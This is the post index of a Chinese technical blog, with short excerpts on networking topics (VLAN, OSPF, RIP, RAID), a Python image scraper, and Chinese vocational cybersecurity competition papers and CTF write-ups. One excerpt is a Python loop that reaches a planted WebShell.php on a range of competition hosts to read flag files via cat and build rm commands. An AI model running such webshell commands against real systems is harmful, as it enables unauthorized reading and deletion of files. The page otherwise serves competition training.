- 博客(41)
- 收藏
- 关注
RSS订阅原创 RAID技术复习笔记
数据条带(Data Stripping):将数据分片存放在不同的磁盘中,多个数据分片组曾一个完整数据副本,访问数据时可以在不同的磁盘上对数据进行读写操作,提高IO性能。raid5:目前最常见的raid等级,原理与raid4相似,区别在于数据校验分布在阵列中所有的磁盘上,没有专门的校验磁盘,对数据和校验数据,它们的写操作可以同时发生在。数据分散保存在Raid多个不同磁盘中,并发数据读写大于单个硬盘的性能,因此可以获得更高的聚合IO带宽,但会减少全体磁盘的总可用空间,牺牲空间换取更高的性能和可靠性。
2023-11-20 16:12:59
444
原创 VLAN技术详解
Vlan详解交换网络二层 数据链路层 sw mac 48位FF:FF:FF:FF交换机 主要来接入终端 扩展接口数量R->SW->PC交换机转发通过mac地址表 全自动学习交换机学习到了 mac地址 与 接口得关系源mac 与 对应接口mac地址表 老化时间300s交换机对于未知帧 不会丢弃 进行泛洪路由查不到路由 丢弃当目的mac地址不在mac表中 交换机会泛洪此帧目标主机会回复 由于有mac地址表 所以根据表项 单薄转发一接口可以绑定多个mac地址一个mac地址
2022-04-05 11:22:00
4609
原创 OSPF详解
OSPF详解ospf链路状态路由协议 全网通过发送LSA来让每一个路由知道全网拓扑企业级 园区级 使用比较广泛 开放式最短路径优先 open shortest path firstdv 和 lsdv 距离 (跳数)矢量(有方向的量 下一跳 路由转发的方向)LS 链路状态路由协议 不传路由 让所有的路由学习到全网拓扑拓扑 设备数量 + 邻居关系LSA链路状态通告 自己所有的信息 每个设备都会产生一个LSA互发LSA a收到b a把b发给c 等。。。。。。LSDB 链路状态数据库 存储
2022-04-05 11:20:10
933
原创 RIP学习笔记
RIP学习笔记1.距离矢量 DV RIP2.链路状态 LSRIP路由信息协议 最早的动态路由协议开启RIP的协议 把自己的路由表 广播给 邻居学习到的路由表180s 没有更新则会删除RIP选路依靠跳数Pre 可信度cost 开销值路由每传第一次 跳数+1[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PQJvb19B-1649128762364)(C:\Users\Administrator\AppData\Roaming\Typora\typo
2022-04-05 11:19:36
676
原创 华为静态路由详解
华为静态路由实验静态路由 需要手动输入目标网段ip 通过arp协议获取对端mac地址 从而建立连接不会自动识别ip 配置简单 缺乏灵活性 连接是单向的默认路由 缺省路由 本质上也属于静态路由配置命令ip route-static 目标网段 子网掩码 下一跳ip在AR6中静态路由为ip route-static 192.168.3.0 (目标网段ip) 24(子网掩码) 192.168.2.20(下一跳地址)在AR7中静态路由为ip route-static 192.168.1.
2022-04-05 11:19:10
9227
原创 华为静态路由实验
华为静态路由实验拓扑图1:静态路由 需要手动输入目标网段ip 通过arp协议获取对端mac地址 从而建立连接不会自动识别ip 配置简单 缺乏灵活性 连接是单向的默认路由 缺省路由 本质上也属于静态路由配置命令ip route-static 目标网段 子网掩码 下一跳ip在AR6中静态路由为ip route-static 192.168.3.0 (目标网段ip) 24(子网掩码) 192.168.2.20(下一跳地址)在AR7中静态路由为ip route-static 192
2022-03-30 10:34:43
850
1
原创 Python爬虫:wallhaven图片爬取
import reimport requestsheaders = { 'Cookie':"cookie自己在F12网络中获取 不提供"}def toplist(): a = 0 one_page_re = '<a class="preview" href="(.*?)"' for i in range(0,29): url = "https://wallhaven.cc/hot?page="+str(i) response
2021-12-15 14:58:25
1471
1
原创 思科VTP技术
VTP(VLAN Trunking Protocol):是VLAN中继协议,也被称为虚拟局域网干道协议。它是思科私有协议。作用是十几台交换机在企业网中,配置VLAN工作量大,可以使用VTP协议,把一台交换机配置成VTP Server, 其余交换机配置成VTP Client,这样他们可以自动学习到server 上的VLAN 信息。通常情况下,我们需要在整个园区网或者企业网中的一组的交换机中保持VLAN数据库的同步,以保证所有交换机都能从数据帧中读取相关的VLAN信息进行正确的数据转发,然而对于大型网络来说,
2021-11-17 15:31:25
640
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(10)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(10)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固
2021-06-06 20:17:20
4232
1
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(9)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(9)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-06-06 19:43:40
1003
1
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(8)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(8)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-06-06 19:15:37
1802
2
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(7)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(7)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-06-03 10:48:23
862
1
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(6)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(6)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-05-27 18:24:00
826
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(5)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(5)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-05-25 06:30:04
780
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(4)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(4)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-05-23 18:09:20
793
1
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(3)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(3)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-05-19 11:57:42
1178
2
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(2)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(2)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全加固 3
2021-05-18 17:36:54
1391
2
原创 2021年中职网络空间安全最新国赛赛题解析仅代表自己的建议——zz-网络安全试题(1)解析
2021年全国职业院校技能大赛(中职组)网络安全竞赛试题(1)(总分100分)赛题说明一、竞赛项目简介“网络安全”竞赛共分A. 基础设施设置与安全加固;B. 网络安全事件响应、数字取证调查和应用安全;C. CTF夺旗-攻击;D. CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。表1 竞赛时间安排与分值权重模块编号 模块名称 竞赛时间(小时) 权值A 基础设施设置与安全...
2021-05-17 11:48:50
3969
9
原创 网络空间安全中职重庆市比赛赛题解析分析四个阶段解析答案(共五套题)第五套题目
2021年中职组“网络安全”赛项重庆市竞赛任务书E一、竞赛时间总计:480分钟二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值A、B模块 A-1 登录安全加固 180分钟 200分A-2 Web安全加固(Web) A-3 流量完整性保护与事件监控(Web,Log) A-4 防火墙策略 B-1 文件MD5校验 400分B-2 数据库安全加固 B-3 Linux操作系统渗透测试 B-4 Web安全之综合渗透测试 阶段切换 阶段切换(午休) 120分钟 0C、D
2021-05-03 11:10:03
1332
原创 网络空间安全中职重庆市比赛赛题解析分析四个阶段解析答案(共五套题)第四套题目
2021年中职组“网络安全”赛项重庆市竞赛任务书D一、竞赛时间总计:480分钟二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值A、B模块 A-1 登录安全加固 180分钟 200分A-2 Web安全加固(Web) A-3 流量完整性保护与事件监控(Web,Log) A-4 防火墙策略 B-1 数据库安全加固 400分B-2 数据分析-B B-3 Windows操作系统渗透测试 B-4 暴力破解 阶段切换 阶段切换(午休) 120分钟 0C、D模块 C模块.
2021-05-03 11:08:53
822
原创 网络空间安全中职重庆市比赛赛题解析分析四个阶段解析答案(共五套题)第三套题目
2021年中职组“网络安全”赛项重庆市竞赛任务书C一、竞赛时间总计:480分钟二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值A、B模块 A-1 Windows操作系统安全配置 180分钟 200分A-2 Linux操作系统安全配置 B-1 数据库安全加固 400分B-2 数据分析-B B-3 Windows操作系统渗透测试 B-4 暴力破解 阶段切换 阶段切换(午休) 120分钟 0C、D模块 C模块 CTF夺旗-攻击 180分钟 200分D模块 CTF夺旗.
2021-05-03 11:06:11
1222
1
原创 网络空间安全中职重庆市比赛赛题解析分析四个阶段解析答案(共五套题)第二套题目
2021年中职组“网络安全”赛项重庆市竞赛任务书B一、竞赛时间总计:480分钟二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值A、B模块 A-1 Windows操作系统安全配置 180分钟 200分A-2 Linux操作系统安全配置 B-1 系统漏洞 400分B-2 隐藏信息探索 B-3 服务远程控制 B-4 Web安全之综合渗透测试 阶段切换 阶段切换(午休) 120分钟 0C、D模块 C模块 CTF夺旗-攻击 180分钟 200分D模块 CTF夺旗-防御 .
2021-05-03 11:03:46
1488
1
原创 网络空间安全中职重庆市比赛赛题解析分析四个阶段解析答案(共五套题)第一套题目
2021年中职组“网络安全”赛项重庆市竞赛任务书A一、竞赛时间总计:480分钟二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值A、B模块 A-1 Windows操作系统安全配置 180分钟 200分A-2 Linux操作系统安全配置 B-1 数据口安全加固 400分B-2 Linux操作系统渗透测试 B-3 系统漏洞 B-4 隐藏信息探索 阶段切换 阶段切换(午休) 120分钟 0C、D模块 C模块 CTF夺旗-攻击 180分钟 200分D模块 CTF夺旗-防御
2021-04-29 18:49:33
2685
1
原创 青少年创意编程未提交的作品------火神山建立(勿喷,很菜)
下载链接提取码:uownimport pygamefrom pygame.locals import *import sysimport timeimport randomimport numpy as np from matplotlib import pyplot as plt import tkinter as tk#*-----------------------------↓tkinter函数区域↓---------------------------------------
2021-04-24 17:59:36
338
1
原创 中职网络安全比赛脚本-WebShell(小福利哦)
webshellimport requestsimport refor i in range(100,110):html = “http://172.16.”+str(i)+".246/WebShell.php?cmd=cat+%2Froot%2Fflagv*"rm = “http://172.16.”+str(i)+".246/WebShell.php?cmd=rm+"try:repon = requests.get(html,timeout=0.1)a = re.search("(.?)
2021-04-15 08:31:22
1164
原创 PHP 漏洞全解 1-9
PHP 漏洞全解(一)-PHP 网页的安全性问题针对 PHP 的网站主要存在下面几种攻击方式:1、命令注入(Command Injection)2、eval 注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL 注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)7、Session 会话劫持(S
2021-04-14 15:10:46
639
原创 网络空间安全中职A模块本人整理的标准答案详细!!!!
购买链接https://download.youkuaiyun.com/download/fxd332024696/16668149网络空间安全中职A模块自己整理的标准答案详细!!!!需要的可以先私聊我,购买后出现问题请联系我!!!!!A-1任务一登录安全加固请对服务器Log、Web、Data 按要求进行相应的设置,提高服务器的安全性。1.密码策略(Log,Web,Data)a. 最小密码长度不少于8个字符;Web;在组策略中设置密码长度最小值为8Log:修改/etc/login.defs文件修改p
2021-04-14 09:26:08
1402
原创 关于开展2021年国赛技能训练协作组申报工作的通知
关于开展2021年全国职业院校技能大赛山东省技能训练协作组申报工作的通知鲁职赛执办字[2021]1号各市教育局、各高等职业院校:根据全国职业院校技能大赛执委会《关于举办2021年全国职业院校技能大赛的预通知》(赛执委函〔2021〕8号)精神,结合我省实际,经研究,决定开展2021年全国职业院校技能大赛山东省技能训练协作组申报工作。现将有关事项通知如下:一、申报工作安排(一)与省赛对应赛项根据《关于2020年全国职业院校技能大赛改革试点赛网上报名和我省组团参赛工作的通知》(鲁职赛执办字[2020]
2021-04-07 09:24:48
951
原创 phpstudy漏洞
PHP study 漏洞洞讲解环境需要:1.phpstudy 8.1.0.7 + nginx 1.5.11 pw:d3yw搭建环境:预期之内 phpstudy.exe安装完会是这样。然后将 upload文件放在www文件夹下然后打开form.html 开始复现。漏洞原理:研究ing...
2021-04-04 16:12:27
976
原创 在linux系统下,搭建NFS服务器/客户端及其应用
一. 实验目的在linux系统下,搭建NFS服务器/客户端及其应用二. 实验原理NFS服务器/客户端及其应用三. 实验内容在linux系统下,搭建NFS服务器/客户端及其应用四. 实验环境描述1、学生机与实验室网络直连; 2、VPC1与实验室网络直连; 3、学生机与VPC1物理链路连通;五. 实验步骤1、学生单击实验拓扑按钮,进入实验场景,单击“开始实验”按钮,进入目标主机,(第一次启动目标主机,还需要安装java控件)2、学生输入账号root,密码123456,登录到实验场景中的目标主
2021-04-04 16:04:18
599
原创 宜昌市中职“网络空间安全”赛项
宜昌市中职“网络空间安全”赛项竞赛任务书E卷一、竞赛时间8:30-11:30,共计3小时。二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值第一阶段单兵模式系统渗透测试 任务一 FTP弱口令渗透测试 100分钟 150任务二 Nmap扫描渗透测试 150任务三 Tomcat中间件安全与加固 200任务四 利用python脚本进行web渗透测试 200备战阶段 攻防对抗准备工作 20分钟 0第二阶段分组对抗 系统加固:15分钟 60分钟 300渗透测试:45分钟
2021-04-04 15:56:38
677
1
原创 2019年度全国职业技能大赛中职组“网络空间安全”赛项
2019年度全国职业技能大赛中职组“网络空间安全”赛项青岛市竞赛任务书一、竞赛时间8:30-11:30,共计3小时。二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值第一阶段单兵模式系统渗透测试 任务一 Windows渗透测试 100分钟 150任务二 漏洞扫描与利用 150任务三 简单盲注 200任务四 文件包含的渗透与加固 200备战阶段 攻防对抗准备工作 20分钟 0第二阶段分组对抗 系统加固:15分钟 60分钟 300渗透测试:45分钟 三、竞赛任务书内容
2021-04-04 15:55:55
1774
原创 2020年度中职组“网络空间安全”赛项
2020年度中职组“网络空间安全”赛项江西省竞赛任务书一、竞赛时间8:30-11:30,共计3小时。二、竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值第一阶段单兵模式系统渗透测试 任务一 简单sql注入 8:30-10:10 150任务二 利用python脚本进行web渗透测试 150任务三 数据分析-A 200任务四 Windows操作系统渗透测试 200备战阶段 攻防对抗准备工作 10:10-10:30 0第二阶段分组对抗 系统加固 10:30-10:45 300渗透
2021-04-04 15:55:25
1599
1
原创 2021年江苏省职业院校技能大赛中职网络安全
2021年江苏省职业院校技能大赛中职网络信息安全赛项试卷(学生组)一、 竞赛时间共计180分钟。二、 竞赛阶段竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值第一阶段单兵模式系统渗透测试 任务一 攻击日志分析 100分钟 10任务二 系统漏洞利用与提权 10任务三 代码审计 12任务四 Web安全渗透测试 12任务五 Linux操作系统渗透测试 12任务六 端口扫描Python渗透测试 14备战阶段 攻防对抗准备工作 20分钟 0第二阶段分组对抗 系统加固 15分钟 3
2021-04-04 15:53:48
2288
原创 2021年全国职业院校技能大赛国赛(中职组)AbCd
A-1任务一登录安全加固请对服务器Log、Web、Data 按要求进行相应的设置,提高服务器的安全性。1.密码策略(Log,Web,Data)a. 最小密码长度不少于8个字符;。管理工具->本地安全策略->账户策略->密码策略,设置密码长度最小值为8b. 密码策略必须同时满足大小写字母、数字、特殊字符。管理工具->本地安全策略->账户策略->密码策略,启用密码必须符合复杂性要求登录策略(Log,Web,Data)a.在用户登录系统时,应该有“For
2021-04-04 15:52:29
8010
3
原创 攻防世界 int_overflow 超超超详细
pwn纯新手教程 如有错误的地方 希望各位大佬们指出.整数溢出int_overflow整数分为有符号(int)和无符号(unsigned int)两种类型有符号数以最高位作为其符号位即正整数最高位为 1,负数为 0无符号数取值范围为非负数常见各类型占用字节数如下:类型 字节 取值范围int 4 -2147483648~2147483647short int 2
2020-10-23 09:58:33
3059
原创 攻防世界 level0 wp
纯新手教程 如有错误的地方 请各位大佬指出.利用的主要工具ida / olldly / Peil / python pwntoolslevel0首先收集一下文件信息64位程序Arch: amd64-64-little 程序位数RELRO:No Relro 开启无法修改got表Stack: No canry found 开启则无法直接覆盖EIP让程序任意跳转,跳转后会进行cookie校验;但这项保护可以被绕过NX开着(开启则shellcode无法被执行)Pie: No
2020-10-23 09:52:02
608
原创 攻防世界 Stegano
**攻防世界 Stegano**难度:简易题目地址题目描述: 菜狗收到了图后很开心,玩起了pdf 提交格式为flag{xxx},解密字符需小写打开pdf后发现都是一些英文复制出来将pdf内容复制到txt中查看 发现存在 baba bbb这样的奇怪字符,这可以联想到摩斯密码的 . - . - . -将A 转换为 .将B 转换为 -脚本a = “BABA BBB BA BBA ABA AB B AAB ABAA AB B AA BBB BA AAA BBAABB AABA ABAA A
2020-09-01 15:09:05
1841
原创 GACTF2020 misc_crymisc
GACTF2020 misc_crymisc本人刚开始打ctf不久,希望各位师傅能对此文章提出宝贵的建议。题目地址.题目文件下载。866h下载好的文件为:crymisc.docx打开后显示报错,考虑将docx转换为zip文件查看docx文件里面的内容:发现题目要求的文件打开3.jpg报错并提示密码错误,这时考虑zip伪加密找到加密位置 改为00即可。奇怪的知识又增加了:zip文件头信息标准开头:50 4B 03 04解压pkware版本:14 00全局方式位标记: 00 00
2020-09-01 10:49:21
1134
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人